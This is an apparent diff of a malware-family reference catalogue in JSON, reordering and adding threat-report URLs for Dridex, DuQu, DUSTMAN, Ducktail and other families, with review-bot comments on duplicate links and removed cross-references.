+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://home.treasury.gov/news/press-releases/sm845",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://twitter.com/felixw3000/status/1382614469713530883?s=20",
+ "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
+ "https://muha2xmad.github.io/unpacking/dridex/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
+ "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
+ "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/",
+ "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://blog.lexfo.fr/dridex-malware.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain",
+ "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/",
+ "https://twitter.com/TheDFIRReport/status/1356729371931860992",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://viql.github.io/dridex/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-dridex",
+ "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
+ "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
+ "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
+ "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/",
+ "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/",
"https://assets.virustotal.com/reports/2021trends.pdf",
"https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/",
- "https://unit42.paloaltonetworks.com/travel-themed-phishing/",
- "https://viql.github.io/dridex/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
- "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
- "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
- "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps",
- "https://www.atomicmatryoshka.com/post/malware-headliners-dridex",
- "https://community.riskiq.com/article/2cd1c003",
- "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
- "https://muha2xmad.github.io/unpacking/dridex/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://home.treasury.gov/news/press-releases/sm845",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
"https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/",
- "https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
"https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/",
- "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
- "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/",
"https://en.wikipedia.org/wiki/Maksim_Yakubets",
- "https://twitter.com/felixw3000/status/1382614469713530883?s=20",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain",
- "https://www.youtube.com/watch?v=1VB15_HgUkg",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://malwarebookreports.com/cryptone-cobalt-strike/",
- "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
- "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf",
- "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://artik.blue/malware3",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
- "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf",
- "https://twitter.com/TheDFIRReport/status/1356729371931860992",
- "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
- "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://intel471.com/blog/privateloader-malware",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "https://community.riskiq.com/article/e4fb7245",
- "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/",
- "https://cyber-anubis.github.io/malware%20analysis/dridex/",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "276c2c2e-09da-44cf-a3f7-806b3feb41da",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e",
"value": "Dridex"
},
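Review bot: the Dridex `refs` list keeps several near-duplicate entries that only differ in scheme or host and could be collapsed while the list is being regenerated anyway: `http://` and `https://` versions of `secureworks.com/research/threat-profiles/gold-drake` and of `.../gold-heron`, the `cisoclub.ru` Group-IB PDF next to its `web.archive.org` copy, and the same McAfee sandbox-evasion post under both `securingtomorrow.mcafee.com` and `www.mcafee.com`. The only genuinely new references here appear to be the Spamhaus 2022 Q3 botnet update and the PRODAFT RIG report; everything else is reordering, plus the removal of the `related` entry pointing at `276c2c2e-09da-44cf-a3f7-806b3feb41da`, which, as with the other entries in this patch, should be an explicit decision rather than a side effect of regeneration.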
@@ -21247,11 +22609,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
- "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
],
"synonyms": [
"Spy.Agent.ORM",
@@ -21292,6 +22654,20 @@
"uuid": "730a4e94-4f9b-4f34-a1f3-1c97d341332c",
"value": "DriveOcean"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.drokbk",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/",
+ "https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b29c0d53-597d-41c9-a1d0-04dbaa4917f8",
+ "value": "Drokbk"
+ },
{
"description": "DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts. ",
"meta": {
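Review bot: the new Drokbk entry ships with `"description": ""`, whereas neighbouring entries such as DropBook carry a one-paragraph summary; please populate it from the Malpedia page or the referenced Secureworks write-up (whose title already states that the malware uses GitHub as a dead-drop resolver) so that searches and galaxy previews show something useful. The `synonyms` and `type` arrays being empty is consistent with other entries, and the alphabetical placement between DriveOcean and DropBook is correct.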
@@ -21326,19 +22702,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack",
- "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/",
- "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
- "https://blog.macnica.net/blog/2020/11/dtrack.html",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/",
- "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securelist.com/my-name-is-dtrack/93338/",
- "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/"
+ "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20",
+ "https://blog.macnica.net/blog/2020/11/dtrack.html",
+ "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/",
+ "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md",
+ "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://securelist.com/dtrack-targeting-europe-latin-america/107798/",
+ "https://securelist.com/my-name-is-dtrack/93338/"
],
"synonyms": [
"TroyRAT"
@@ -21366,10 +22744,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel",
- "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/",
- "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN",
+ "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/",
"http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html",
- "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/"
+ "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/",
+ "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN"
],
"synonyms": [],
"type": []
@@ -21396,7 +22774,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail",
"https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/",
- "https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf"
+ "https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf",
+ "https://www.f-secure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf",
+ "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html",
+ "https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection",
+ "https://yoroi.company/research/ducktail-dissecting-a-complex-infection-chain-started-from-social-engineering/"
],
"synonyms": [],
"type": []
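Review bot: the Ducktail hunk adds `"https://www.f-secure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf"` directly below the existing `"https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf"`; the file name indicates these are the same report hosted on two domains, so keep one (preferably the current WithSecure host) or note why both are wanted. The Trend Micro, Deep Instinct and Yoroi additions look fine.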
@@ -21422,23 +22804,15 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://docs.broadcom.com/doc/w32-duqu-11-en",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
- "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf",
- "https://docs.broadcom.com/doc/w32-duqu-11-en"
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "809b54c3-dd6a-4ec9-8c3a-a27b9baa6732",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6",
"value": "DuQu"
},
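Review bot: two points on the DuQu hunk. First, it removes the `related` block with `dest-uuid` `809b54c3-dd6a-4ec9-8c3a-a27b9baa6732` without any corresponding replacement, the same unexplained loss of a cross-reference seen in other entries of this patch. Second, the newly added `"https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html"` is, judging by its path, a general persistence tutorial rather than a DuQu analysis; if it is kept because it references DuQu, fine, but it sits oddly next to the CrySyS, Kaspersky and Symantec primary sources.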
@@ -21447,25 +22821,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman",
- "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html",
+ "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
"https://twitter.com/Irfan_Asrar/status/1213544175355908096",
- "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/",
+ "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ff692a4c-23ff-4e86-a03b-2de8d36bc98f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "daa3d1e4-9265-4f1c-b1bd-9242ac570681",
"value": "DUSTMAN"
},
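Review bot: the DUSTMAN hunk also drops its `related` array (`dest-uuid` `ff692a4c-23ff-4e86-a03b-2de8d36bc98f`, tagged almost-certain) while otherwise only reordering `refs` and adding CrowdStrike's wiper part 3. Since this is the fourth entry in the patch where a `related` link disappears, the pattern points at a generator change rather than a per-entry curation decision; the commit message should state that, and the removed UUID links should be verified as still reachable through the target cluster.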
@@ -21474,10 +22840,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
],
"synonyms": [
"Escad"
@@ -21492,11 +22858,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack",
+ "https://content.fireeye.com/apt/rpt-apt38",
"https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch",
- "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://github.com/649/APT38-DYEPACK",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/",
+ "https://github.com/649/APT38-DYEPACK"
],
"synonyms": [
"swift"
@@ -21524,19 +22890,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
"https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
- "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates",
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
"https://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.secureworks.com/research/dyre-banking-trojan",
+ "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates",
